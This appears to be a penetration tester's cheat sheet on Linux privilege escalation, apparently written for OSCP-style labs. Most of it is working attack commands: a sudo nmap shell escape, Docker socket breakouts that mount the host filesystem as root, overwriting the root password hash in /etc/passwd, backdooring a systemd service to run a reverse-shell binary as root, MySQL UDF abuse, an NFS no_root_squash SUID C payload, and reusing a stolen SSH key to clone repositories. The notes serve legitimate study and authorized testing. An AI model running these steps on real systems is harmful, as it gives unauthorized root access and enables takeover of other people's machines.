Linux Privilege Escalation

Linux Privilege Escalation

Commands

sudo -u scriptmanager bash

Tips:

• PE could rely on the same vulnerability to obtain an initial foothold.

Scripts

• Linpeas.sh

SUDO Misconfigurations

NOPASSWD - run Sudo without a password

$ sudo -l                # confirm misconfiguration
$ sudo nmap --interative # start interactive nmap
nmap> !sh                # pop root shell

LD_PRELOAD

SUID / SGID

SUID3ENUM.py

• Find SUID binaries → cross-match with GTFO bins.
• Don’t use -e flag for auto-exploitation (OSCP banned).

$ python suid3num.py

Running services

Tips:

• Check firewall rules.
• Check for anti-virus software and see if you need to disable.

Method 1:

• Check if services running as root are writable by user.
• Overwrite binary or reference file/arg with your own payload for privesc.

Method 2:

• Check version of services running as root.
• See if vulnerable to a local privilege escalation vuln.

Binary service versions

GTFOBins

• GTFOBins are a list of Unix binaries that can be used for privesc in misconfigured systems.
• Check your binaries against GTFOBins list.

Vulnerable binary versions

1. Look for binaries, especially non-standard ones.
2. Run $ searchsploit [binary_name] [version] and exploit.

Docker privesc

Basic privesc example: https://flast101.github.io/docker-privesc/ More on Docker breakout & privesc: https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout

Writable Docker Socket /var/run/docker.sock: see here

• Detected Linpeas.sh or manually.
• Requires image → if none, run docker pull to download an image to machine.

# CHECK IF WRITABLE
$ ls -la /var/run/docker.sock

# OPTION 1
$ docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash

# OPTION 2
$ docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh

Writable /etc/passwd

Replace root password hash

1. Kali: generate a password openssl passwd hacker123 and obtain a password hash.
2. Target: replace root password x in /etc/passwd file with password hash i.e. root:<has>:0:0:----

Writable .Service Files

Check if you can write any .service file, if you can, you could modify it so it executes your backdoor when the service is started, restarted or stopped.

# check contents of .Service file
$ cat /etc/systemd/system/app.Service
[Unit]
Description=Python App
After=network-online.target
[Service]
Type=simple
WorkingDirectory=/home/john/app
ExecStart=flask run -h 0.0.0.0 -p 50000
TimeoutSec=30
RestartSec=15s
User=john
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
 
[Install]
WantedBy=multi-user.target
 
# change configuration
(remote)WorkingDirectory=XXX
ExecStart=/home/john/rshell
User=root
 
# restart host or service
$ sudo reboot
$ service xxx restart

MySQL User-Defined-Functions (UDF)

Mysql UDF privilege escalation.

• https://medium.com/r3d-buck3t/privilege-escalation-with-mysql-user-defined-functions-996ef7d5ceaf
• https://steflan-security.com/linux-privilege-escalation-exploiting-user-defined-functions/

If you get the below error, simply replace /usr/lib/mysql/plugin/raptor_udf2.so with the raptor_udf2.so file you created originally.

mysql> create function do_system returns integer soname ’raptor_udf2.so’ ;
ERROR 1126 (HY000) : Can’t open shared library ’raptor_udf2.so’ (errno : 0 /usr/lib/mysql/plugin/raptor_udf2.so : file too short)

If you cannot execute commands interactively, exec interactively by:

• mysql -u root -p[password] mysql -e "[mysql_command]"

NFS ‘NO_ROOT_SQUASH’ Misconfiguration

Exploit NFS shares for privesc.

Discover vulnerability with cat /etc/exports and see if a directory is configured as NO_ROOT_SQUASH.

• You can access it from as a client and write inside that directory as if you were the local root of the machine.
• See https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.

Mount misconfigured directory

$ showmount -e 192.168.xx.53
Export list for 192.168.xx.53:
/shared 192.168.xx.0/255.255.255.0
$ mkdir /tmp/mymount
/bin/mkdir: created directory '/tmp/mymount'
$ mount -t nfs 192.168.xx.53:/shared /tmp/mymount -o nolock

Create payload

# generic C exploit
#include <stdio.h>
#include <unistd.h>
int main(void)
{
setuid(0);
setgid(0);
system("/bin/bash");
}
gcc exploit.c -m32 -o exploit

Copy payload → set SUID bit

$ cp /root/Desktop/x /tmp/mymount/
$ chmod u+s exploit

Git

Found references to git / git repo + a private SSH key?

# extract remote repository
$ mv /home/[user]/.ssh/id_rsa ~/.ssh/                # copy key to your .ssh dir
$ git clone file:///[repo_name]                      # git clone OPTION 1
$ git clone ssh://[user]@[target]:[port]/[repo_name] # git clone OPTION 2